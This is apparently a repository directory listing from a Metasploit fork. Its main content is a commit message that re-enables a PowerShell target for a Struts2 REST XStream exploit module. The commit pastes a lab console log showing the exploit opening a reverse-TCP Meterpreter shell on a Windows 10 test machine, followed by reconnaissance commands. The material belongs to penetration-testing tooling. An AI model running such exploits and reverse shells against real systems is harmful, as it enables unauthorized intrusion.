Files
metasploit-gs/modules/exploits/multi
William Vu df5f4caaae Uncomment PSH target in struts2_rest_xstream
I'm full of shit. It works.

msf5 exploit(multi/http/struts2_rest_xstream) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Powershell command length: 2467
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49691) at 2018-08-27 20:00:47 -0500

meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
2018-08-27 20:01:00 -05:00
..
2017-07-24 06:26:21 -07:00
2017-07-24 06:26:21 -07:00
2018-05-25 02:59:08 -05:00
2017-07-24 06:26:21 -07:00
2018-02-10 16:32:20 +00:00
2017-11-09 03:00:24 +11:00
2017-07-24 06:26:21 -07:00
2017-07-24 06:26:21 -07:00
2017-07-24 06:26:21 -07:00
2018-08-15 21:27:40 -05:00
2017-07-24 06:26:21 -07:00
2017-07-24 06:26:21 -07:00
2017-07-24 06:26:21 -07:00
2017-07-24 06:26:21 -07:00
2018-02-27 04:30:09 -06:00